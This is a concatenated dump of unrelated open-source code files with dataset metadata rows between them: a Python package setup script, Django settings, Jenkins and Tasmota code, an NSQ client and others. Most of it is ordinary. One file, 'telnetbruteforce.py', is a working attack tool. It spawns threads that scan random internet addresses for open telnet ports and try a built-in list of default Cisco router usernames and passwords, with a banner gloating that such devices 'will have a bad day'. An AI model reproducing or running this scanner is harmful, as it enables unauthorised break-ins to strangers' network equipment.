| mit | -3,647,904,103,707,750,400 | 33.982143 | 72 | 0.58244 | false | 4.587822 | false | false | false |
hammerlab/varcode | setup.py | 1 | 2683 | # Copyright (c) 2014-2019. Mount Sinai School of Medicine
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import os
import re
from setuptools import setup, find_packages
readme_filename = "README.md"
current_directory = os.path.dirname(__file__)
readme_path = os.path.join(current_directory, readme_filename)
try:
with open(readme_path, 'r') as f:
readme_markdown = f.read()
except Exception as e:
readme_markdown = ""
print(e)
print("Failed to open %s" % readme_path)
# Determine version number
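# (parsed from varcode/__init__.py so the version lives in a single place)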
with open('varcode/__init__.py', 'r') as f:
version = re.search(
r'^__version__\s*=\s*[\'"]([^\'"]*)[\'"]',
f.read(),
re.MULTILINE).group(1)
print("Version: %s" % version)
if __name__ == '__main__':
setup(
name='varcode',
packages=find_packages(),
package_data={'varcode.cli': ['logging.conf']},
version=version,
description="Variant annotation in Python",
long_description=readme_markdown,
long_description_content_type='text/markdown',
url="https://github.com/openvax/varcode",
author="Alex Rubinsteyn",
author_email="[email protected]",
license="http://www.apache.org/licenses/LICENSE-2.0.html",
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Operating System :: OS Independent',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: Apache Software License',
'Programming Language :: Python',
'Topic :: Scientific/Engineering :: Bio-Informatics',
],
install_requires=[
'numpy>=1.7, <2.0',
'pandas>=0.15',
'pyensembl>=1.8.1',
'biopython>=1.64',
'pyvcf>=0.6.7',
'memoized_property>=1.0.2',
'serializable>=0.2.1',
'sercol>=0.1.4',
],
entry_points={
'console_scripts': [
'varcode-genes = varcode.cli.genes_script:main',
'varcode = varcode.cli.effects_script:main',
]
})
| apache-2.0 | 7,290,187,730,248,771,000 | 33.397436 | 74 | 0.598211 | false | 3.747207 | false | false | false |
ubuntunux/GuineaPig | PyEngine3D/Utilities/Utility.py | 2 | 2490 | import time
import sys
import gc
import os
import datetime
class Profiler:
profile_map = {}
start_time = 0.0
section_start_time = 0.0
@staticmethod
def start(profile_name=''):
if profile_name not in Profiler.profile_map:
Profiler.profile_map[profile_name] = time.perf_counter()
else:
print('%s is already exists.' % profile_name)
@staticmethod
def end(profile_name=''):
if profile_name in Profiler.profile_map:
start_time = Profiler.profile_map.pop(profile_name)
print('%s : %.2fms' % (profile_name, (time.perf_counter() - start_time) * 1000.0))
@staticmethod
def set_stop_watch():
Profiler.start_time = time.perf_counter()
Profiler.section_start_time = Profiler.start_time
@staticmethod
def get_stop_watch(profile_name=''):
current_time = time.perf_counter()
print('%s : %.2fms ( elapsed %.2fms )' % (profile_name,
(current_time - Profiler.section_start_time) * 1000.0,
(current_time - Profiler.start_time) * 1000.0))
Profiler.section_start_time = current_time
@staticmethod
def check(func):
def decoration(*args, **kargs):
start_time = time.perf_counter()
result = func(*args, **kargs)
print('%s : %.2fms' % (func.__name__, (time.perf_counter() - start_time) * 1000.0))
return result
return decoration
def GetClassName(cls):
return cls.__class__.__name__
def is_gz_compressed_file(filename):
with open(filename,'rb') as f:
return f.read(3) == b'\x1f\x8b\x08'
return False
def check_directory_and_mkdir(dirname):
if dirname and not os.path.exists(dirname):
os.makedirs(dirname)
def get_modify_time_of_file(filepath):
if filepath != "" and os.path.exists(filepath):
timeStamp = os.path.getmtime(filepath)
return str(datetime.datetime.fromtimestamp(timeStamp))
return str(datetime.datetime.min)
def delete_from_referrer(obj):
"""
desc : Find and remove all references to obj.
"""
referrers = gc.get_referrers(obj)
for referrer in referrers:
if type(referrer) == dict:
for key, value in referrer.items():
if value is obj:
referrer[key] = None
def object_copy(src, dst):
dst.__dict__ = src.__dict__
| bsd-2-clause | -4,164,883,789,592,392,000 | 28.294118 | 109 | 0.582731 | false | 3.733133 | false | false | false |
snipperrifle/Router-Telnet-BadDay | telnetbruteforce.py | 1 | 3132 | import threading
import telnetlib
import sys
import socket
import random
import thread
import time
print "|","-"*61, "|"
print "|\tAll of cisco routers , switches with default\t\t|\n|\tusername and passwords are will have a bad day today\t|"
print "|","-"*61, "|"
def bruteForce(ip):
dict={"Administrator":"admin","|Administrator":"changeme","cisco":"cisco","admin":"admin","|admin":"diamond","||admin":"cisco","root":"Cisco","|root":"password","||root":"blender","|||root":"attack","bbsd-client":"changeme2","cmaker":"cmaker","cusadmin":"password","hsa":"hsadb","netrangr":"attack","wlse":"wlsedb","wlseuser":"wlseuser"}
for key,value in dict.iteritems():
key = key.replace("|" , "")
try:
#print " Trying User:",key," Password:",value ," on " , ip
tn = telnetlib.Telnet(ip,23,2)
tn.read_until((":" or ">" or "$" or "@"))
tn.write(key + "\n")
tn.read_until((":" or ">" or "$" or "@"))
tn.write(value + "\n")
tn.write("dir\n")
tn.write("exit\n")
tn.read_all()#we can print this to get the banner
print "\t\nLogin successful:", key , " -> " , value
tn.close()
sys.exit(1)
except Exception ,e:
#print ip , " --> " , e
pass
finally:
try:
tn.close()
except Exception , e:
pass
#randy()
def randy():
a=random.randint(1,254)
b=random.randint(1,254)
c=random.randint(1,254)
d=random.randint(1,4)
ip=str(a) + "." +str(b) + "." +str(c) + "." +str(d)
try:
telnetlib.Telnet(ip , 23 , 2)
print "Telneting on host : " , ip
bruteForce(ip)
except Exception ,e:
#print ip," => does not have telnet enabled" , e
randy()
for threads in range(0,20):
thread.start_new_thread(randy,())
time.sleep(0.5)
"""
if len(sys.argv) !=4:
print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
sys.exit(1)
#----------------------------------------------------------------
try:
userlist = open(sys.argv[2], "r").readlines()
#userlist.close()
for user in userlist:
user = user.strip("\n")
users.append(user)
except(IOError):
print "Error: Check your userlist path\n"
sys.exit(1)
#------------------------------------------------------------------
try:
wordlist = open(sys.argv[3], "r").readlines()
#wordlist.close()
except(IOError):
print "Error: Check your wordlist path\n"
sys.exit(1)
for word in wordlist:
words.append(word)
#lock = threading.Lock()
#lock.acquire()
#lock.release()
for key , value in dict.iteritems():
print key.replace("|","")+"="+value
"""
| gpl-2.0 | -9,115,303,984,904,878,000 | 31.968421 | 345 | 0.462005 | false | 3.810219 | false | false | false |
hsab/UMOG | umog_addon/sockets/boolean.py | 1 | 1147 | import bpy
import sys
from bpy.props import *
from .. base_types import UMOGSocket
from .. utils.events import propUpdate
class BooleanSocket(bpy.types.NodeSocket, UMOGSocket):
# Description string
'''Custom Boolean socket type'''
# Optional identifier string. If not explicitly defined, the python class name is used.
bl_idname = 'BooleanSocketType'
# Label for nice name display
bl_label = 'Boolean Socket'
dataType = "Boolean"
allowedInputTypes = ["Float", "Integer", "Boolean"]
useIsUsedProperty = False
defaultDrawType = "PREFER_PROPERTY"
drawColor = (0.247058824, 0.317647059, 0.705882353, 1)
value = BoolProperty(default=True, update=propUpdate)
def drawProperty(self, context, layout, layoutParent, text, node):
layout.prop(self, "value", text=text)
pass
def refresh(self):
self.name = str(self.value)
def getValue(self):
return self.value
def setProperty(self, data):
if type(data) is bool:
self.value = data
else:
self.value = data > 0
def getProperty(self):
return self.value
| gpl-3.0 | 7,742,348,119,109,303,000 | 25.674419 | 91 | 0.658239 | false | 3.83612 | false | false | false |
WebSciences/searcular-old | pinry/settings/__init__.py | 1 | 2867 | import os
# import djcelery
from django.contrib.messages import constants as messages
# djcelery.setup_loader()
SITE_ROOT = os.path.join(os.path.realpath(os.path.dirname(__file__)), '../../')
# Changes the naming on the front-end of the website.
SITE_NAME = 'Searcular v2'
# Set to False to disable people from creating new accounts.
ALLOW_NEW_REGISTRATIONS = True
# Set to False to force users to login before seeing any pins.
PUBLIC = True
TIME_ZONE = 'Europe/London'
LANGUAGE_CODE = 'en-us'
USE_I18N = True
USE_L10N = True
USE_TZ = True
MEDIA_URL = '/media/'
STATIC_URL = '/static/'
MEDIA_ROOT = os.path.join(SITE_ROOT, 'media')
STATIC_ROOT = os.path.join(SITE_ROOT, 'static')
TEMPLATE_DIRS = [os.path.join(SITE_ROOT, 'pinry/templates')]
STATICFILES_DIRS = [os.path.join(SITE_ROOT, 'pinry/static')]
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'compressor.finders.CompressorFinder'
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'pinry.users.middleware.Public',
'pinry.core.middleware.Public',
)
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.request',
'django.contrib.messages.context_processors.messages',
'pinry.core.context_processors.template_settings',
)
AUTHENTICATION_BACKENDS = (
'pinry.users.auth.backends.CombinedAuthBackend',
'django.contrib.auth.backends.ModelBackend',
)
ROOT_URLCONF = 'pinry.urls'
LOGIN_URL = '/login/'
LOGIN_REDIRECT_URL = '/'
INTERNAL_IPS = ['127.0.0.1']
MESSAGE_TAGS = {
messages.WARNING: 'alert',
messages.ERROR: 'alert alert-error',
messages.SUCCESS: 'alert alert-success',
messages.INFO: 'alert alert-info',
}
API_LIMIT_PER_PAGE = 50
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'south',
'taggit',
'compressor',
'django_images',
'provider',
'provider.oauth2',
'pinry.core',
'pinry.users',
)
IMAGE_PATH = 'pinry.core.utils.upload_path'
IMAGE_SIZES = {
'thumbnail': {'size': [240, 0]},
'standard': {'size': [600, 0]},
'square': {'crop': True, 'size': [125, 125]},
}
| agpl-3.0 | 8,192,452,103,675,637,000 | 26.04717 | 79 | 0.697942 | false | 3.329849 | false | true | false |
kagklis/timeseries-summary | Prediction.py | 1 | 4455 | '''
The MIT License (MIT)
Copyright (c) 2016 kagklis
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from math import sqrt
import numpy as np
from copy import deepcopy
from pandas import Series, DatetimeIndex
import statsmodels.api as sm
from statsmodels.graphics.api import qqplot
from statsmodels.tsa.arima_model import _arma_predict_out_of_sample
def limit_range(values, nm, nM):
M = max(values)
m = min(values)
oldRange = M-m
newRange = nM-nm
for i in range(len(values)):
values[i] = (((values[i] - m)*newRange)/oldRange) + nm
return(values)
def mean(values):
return (sum(values)*1.0)/len(values)
def stanDev(values):
m = mean(values)
total_sum = 0
for i in range(len(values)):
total_sum += (values[i]-m)**2
under_root = (total_sum*1.0)/len(values)
return (m,sqrt(under_root))
def linreg(X, Y):
"""
return a,b in solution to y = ax + b such that root mean square distance between trend line and original points is minimized
"""
N = len(X)
Sx = Sy = Sxx = Syy = Sxy = 0.0
for x, y in zip(X, Y):
Sx = Sx + x
Sy = Sy + y
Sxx = Sxx + x*x
Syy = Syy + y*y
Sxy = Sxy + x*y
det = Sxx * N - Sx * Sx
return (Sxy * N - Sy * Sx)/det, (Sxx * Sy - Sx * Sxy)/det
def predict(data, Ds, AL, steps):
key = data.keys()
key = key[0]
V = len(data[key])
# Create N-step prediction using ARMA method on the initial timeseries
res = sm.tsa.ARMA(data[key][0:(V-1-steps)], (3, 0)).fit()
params = res.params
residuals = res.resid
p = res.k_ar
q = res.k_ma
k_exog = res.k_exog
k_trend = res.k_trend
temp = _arma_predict_out_of_sample(params, steps, residuals, p, q, k_trend, k_exog, endog=data[key], exog=None, start=V-steps)
pArma = [data[key][V-steps-1]]
pArma.extend(temp)
arma_t = Series(pArma, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D"))
print("ARMA: \n",arma_t)
pred = deepcopy(data)
offset = 1
# Create N-step prediction using recursive ARMA method on the initial timeseries
for ss in range(steps, 0, -offset):
res = sm.tsa.ARMA(pred[key][0:(V-1-ss)], (3, 0)).fit()
params = res.params
residuals = res.resid
p = res.k_ar
q = res.k_ma
k_exog = res.k_exog
k_trend = res.k_trend
pred[key][V-ss] = _arma_predict_out_of_sample(params, offset, residuals, p, q, k_trend, k_exog, endog=data[key], exog=None, start=V-ss)[0]
rArma = [data[key][V-steps-1]]
rArma.extend(pred[key][V-steps:(V+1)])
arma_t_r = Series(rArma, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D"))
print("rARMA: \n",arma_t_r)
# Create N-step prediction using Summarization Features
ext_Ds = np.pad(Ds, steps, mode='symmetric')
ext_Ds = [ext_Ds[len(ext_Ds)-steps+i] for i in range(steps)]
#print("Ds:",ext_Ds)
m, s = stanDev(data[key])
a,b = linreg(range(len(AL)), AL)
r = [a*index + b for index in range(len(AL)+steps)]
temp2 = [(ext_Ds[i]+r[len(AL)-1+i])/10 for i in range(steps)]
fcst = [data[key][V-steps-1]]
fcst.extend(temp2)
summarized_t = Series(fcst, index=DatetimeIndex([data[key].index[V-steps-1+i] for i in range(steps+1)],freq="D"))
print("Summarized: \n",summarized_t)
return(arma_t, arma_t_r, summarized_t)
| mit | 3,701,691,037,603,330,600 | 32.246269 | 146 | 0.642649 | false | 3.080913 | false | false | false |
gtest-org/test14 | jenkins_jobs/modules/general.py | 9 | 4236 | # Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
The Logrotate section allows you to automatically remove old build
history. It adds the ``logrotate`` attribute to the :ref:`Job`
definition.
All logrotate attributes have default "-1" value so you don't need to specify
that explicitly
Example::
- job:
name: test_job
logrotate:
daysToKeep: 3
numToKeep: 20
artifactDaysToKeep: -1
artifactNumToKeep: -1
The Assigned Node section allows you to specify which Jenkins node (or
named group) should run the specified job. It adds the ``node``
attribute to the :ref:`Job` definition.
Example::
- job:
name: test_job
node: precise
That speficies that the job should be run on a Jenkins node or node group
named ``precise``.
"""
import xml.etree.ElementTree as XML
import jenkins_jobs.modules.base
class General(jenkins_jobs.modules.base.Base):
sequence = 10
def gen_xml(self, parser, xml, data):
jdk = data.get('jdk', None)
if jdk:
XML.SubElement(xml, 'jdk').text = jdk
XML.SubElement(xml, 'actions')
desc_text = data.get('description', None)
if desc_text is not None:
description = XML.SubElement(xml, 'description')
description.text = desc_text
XML.SubElement(xml, 'keepDependencies').text = 'false'
disabled = data.get('disabled', None)
if disabled is not None:
if disabled:
XML.SubElement(xml, 'disabled').text = 'true'
else:
XML.SubElement(xml, 'disabled').text = 'false'
if 'display-name' in data:
XML.SubElement(xml, 'displayName').text = data['display-name']
if data.get('block-downstream'):
XML.SubElement(xml,
'blockBuildWhenDownstreamBuilding').text = 'true'
else:
XML.SubElement(xml,
'blockBuildWhenDownstreamBuilding').text = 'false'
if data.get('block-upstream'):
XML.SubElement(xml,
'blockBuildWhenUpstreamBuilding').text = 'true'
else:
XML.SubElement(xml,
'blockBuildWhenUpstreamBuilding').text = 'false'
if 'auth-token' in data:
XML.SubElement(xml, 'authToken').text = data['auth-token']
if data.get('concurrent'):
XML.SubElement(xml, 'concurrentBuild').text = 'true'
else:
XML.SubElement(xml, 'concurrentBuild').text = 'false'
if 'workspace' in data:
XML.SubElement(xml, 'customWorkspace').text = \
str(data['workspace'])
if 'quiet-period' in data:
XML.SubElement(xml, 'quietPeriod').text = str(data['quiet-period'])
node = data.get('node', None)
if node:
XML.SubElement(xml, 'assignedNode').text = node
XML.SubElement(xml, 'canRoam').text = 'false'
else:
XML.SubElement(xml, 'canRoam').text = 'true'
if 'logrotate' in data:
lr_xml = XML.SubElement(xml, 'logRotator')
logrotate = data['logrotate']
lr_days = XML.SubElement(lr_xml, 'daysToKeep')
lr_days.text = str(logrotate.get('daysToKeep', -1))
lr_num = XML.SubElement(lr_xml, 'numToKeep')
lr_num.text = str(logrotate.get('numToKeep', -1))
lr_adays = XML.SubElement(lr_xml, 'artifactDaysToKeep')
lr_adays.text = str(logrotate.get('artifactDaysToKeep', -1))
lr_anum = XML.SubElement(lr_xml, 'artifactNumToKeep')
lr_anum.text = str(logrotate.get('artifactNumToKeep', -1))
| apache-2.0 | -6,258,473,018,899,836,000 | 36.821429 | 79 | 0.613787 | false | 3.925857 | false | false | false |
davegardnerisme/nsq | pynsq/nsq/async.py | 15 | 3260 | import socket
import struct
import logging
import tornado.iostream
import nsq
class AsyncConn(object):
def __init__(self, host, port, connect_callback, data_callback, close_callback, timeout=1.0):
assert isinstance(host, (str, unicode))
assert isinstance(port, int)
assert callable(connect_callback)
assert callable(data_callback)
assert callable(close_callback)
assert isinstance(timeout, float)
self.connecting = False
self.connected = False
self.host = host
self.port = port
self.connect_callback = connect_callback
self.data_callback = data_callback
self.close_callback = close_callback
self.timeout = timeout
def connect(self):
if self.connected or self.connecting:
return
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.settimeout(self.timeout)
self.s.setblocking(0)
self.stream = tornado.iostream.IOStream(self.s)
self.stream.set_close_callback(self._socket_close)
self.connecting = True
self.stream.connect((self.host, self.port), self._connect_callback)
def _connect_callback(self):
self.connecting = False
self.connected = True
self.stream.write(nsq.MAGIC_V2)
self._start_read()
try:
self.connect_callback(self)
except Exception:
logging.exception("uncaught exception in connect_callback")
def _start_read(self):
self.stream.read_bytes(4, self._read_size)
def _socket_close(self):
self.connected = False
try:
self.close_callback(self)
except Exception:
logging.exception("uncaught exception in close_callback")
def close(self):
self.connected = False
self.stream.close()
def _read_size(self, data):
try:
size = struct.unpack('>l', data)[0]
self.stream.read_bytes(size, self._read_body)
except Exception:
self.close()
logging.exception("failed to unpack size")
def _read_body(self, data):
try:
self.data_callback(self, data)
except Exception:
logging.exception("uncaught exception in data_callback")
tornado.ioloop.IOLoop.instance().add_callback(self._start_read)
def send(self, data):
self.stream.write(data)
def __str__(self):
return self.host + ':' + str(self.port)
if __name__ == '__main__':
def connect_callback(c):
print "connected"
c.send(nsq.subscribe('test', 'ch', 'a', 'b'))
c.send(nsq.ready(1))
def close_callback(c):
print "connection closed"
def data_callback(c, data):
unpacked = nsq.unpack_response(data)
if unpacked[0] == nsq.FRAME_TYPE_MESSAGE:
c.send(nsq.ready(1))
msg = nsq.decode_message(unpacked[1])
print msg.id, msg.body
c.send(nsq.finish(msg.id))
c = AsyncConn("127.0.0.1", 4150, connect_callback, data_callback, close_callback)
c.connect()
tornado.ioloop.IOLoop.instance().start()
| mit | -2,042,503,924,097,074,000 | 29.185185 | 97 | 0.589571 | false | 3.980464 | false | false | false |
soldag/home-assistant | tests/components/tasmota/test_light.py | 2 | 35443 | """The tests for the Tasmota light platform."""
import copy
import json
from hatasmota.const import CONF_MAC
from hatasmota.utils import (
get_topic_stat_result,
get_topic_tele_state,
get_topic_tele_will,
)
from homeassistant.components import light
from homeassistant.components.light import (
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_TRANSITION,
SUPPORT_WHITE_VALUE,
)
from homeassistant.components.tasmota.const import DEFAULT_PREFIX
from homeassistant.const import ATTR_ASSUMED_STATE, STATE_OFF, STATE_ON
from .test_common import (
DEFAULT_CONFIG,
help_test_availability,
help_test_availability_discovery_update,
help_test_availability_poll_state,
help_test_availability_when_connection_lost,
help_test_discovery_device_remove,
help_test_discovery_removal,
help_test_discovery_update_unchanged,
help_test_entity_id_update_discovery_update,
help_test_entity_id_update_subscriptions,
)
from tests.async_mock import patch
from tests.common import async_fire_mqtt_message
from tests.components.light import common
async def test_attributes_on_off(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") is None
assert state.attributes.get("min_mireds") is None
assert state.attributes.get("max_mireds") is None
assert state.attributes.get("supported_features") == 0
async def test_attributes_dimmer(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 1 # 1 channel light (dimmer)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") is None
assert state.attributes.get("min_mireds") is None
assert state.attributes.get("max_mireds") is None
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_TRANSITION
)
async def test_attributes_ct(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 2 # 2 channel light (CW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") is None
assert state.attributes.get("min_mireds") == 153
assert state.attributes.get("max_mireds") == 500
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_TRANSITION
)
async def test_attributes_ct_reduced(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 2 # 2 channel light (CW)
config["so"]["82"] = 1 # Reduced CT range
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") is None
assert state.attributes.get("min_mireds") == 200
assert state.attributes.get("max_mireds") == 380
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_COLOR_TEMP | SUPPORT_TRANSITION
)
async def test_attributes_rgb(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 3 # 3 channel light (RGB)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") == [
"None",
"Wake up",
"Cycle up",
"Cycle down",
"Random",
]
assert state.attributes.get("min_mireds") is None
assert state.attributes.get("max_mireds") is None
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS | SUPPORT_COLOR | SUPPORT_EFFECT | SUPPORT_TRANSITION
)
async def test_attributes_rgbw(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 4 # 5 channel light (RGBW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") == [
"None",
"Wake up",
"Cycle up",
"Cycle down",
"Random",
]
assert state.attributes.get("min_mireds") is None
assert state.attributes.get("max_mireds") is None
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS
| SUPPORT_COLOR
| SUPPORT_EFFECT
| SUPPORT_TRANSITION
| SUPPORT_WHITE_VALUE
)
async def test_attributes_rgbww(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") == [
"None",
"Wake up",
"Cycle up",
"Cycle down",
"Random",
]
assert state.attributes.get("min_mireds") == 153
assert state.attributes.get("max_mireds") == 500
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS
| SUPPORT_COLOR
| SUPPORT_COLOR_TEMP
| SUPPORT_EFFECT
| SUPPORT_TRANSITION
| SUPPORT_WHITE_VALUE
)
async def test_attributes_rgbww_reduced(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
config["lt_st"] = 5 # 5 channel light (RGBCW)
config["so"]["82"] = 1 # Reduced CT range
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.attributes.get("effect_list") == [
"None",
"Wake up",
"Cycle up",
"Cycle down",
"Random",
]
assert state.attributes.get("min_mireds") == 200
assert state.attributes.get("max_mireds") == 380
assert (
state.attributes.get("supported_features")
== SUPPORT_BRIGHTNESS
| SUPPORT_COLOR
| SUPPORT_COLOR_TEMP
| SUPPORT_EFFECT
| SUPPORT_TRANSITION
| SUPPORT_WHITE_VALUE
)
async def test_controlling_state_via_mqtt_on_off(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 1
config["so"]["30"] = 1 # Enforce Home Assistant auto-discovery as light
mac = config["mac"]
async_fire_mqtt_message(
hass,
f"{DEFAULT_PREFIX}/{mac}/config",
json.dumps(config),
)
await hass.async_block_till_done()
state = hass.states.get("light.test")
assert state.state == "unavailable"
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/LWT", "Online")
state = hass.states.get("light.test")
assert state.state == STATE_OFF
assert not state.attributes.get(ATTR_ASSUMED_STATE)
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/tele/STATE", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"ON"}')
state = hass.states.get("light.test")
assert state.state == STATE_ON
async_fire_mqtt_message(hass, "tasmota_49A3BC/stat/RESULT", '{"POWER":"OFF"}')
state = hass.states.get("light.test")
assert state.state == STATE_OFF
async def test_controlling_state_via_mqtt_ct(hass, mqtt_mock, setup_tasmota):
"""Test state update via MQTT."""
config = copy.deepcopy(DEFAULT_CONFIG)
config["rl"][0] = 2
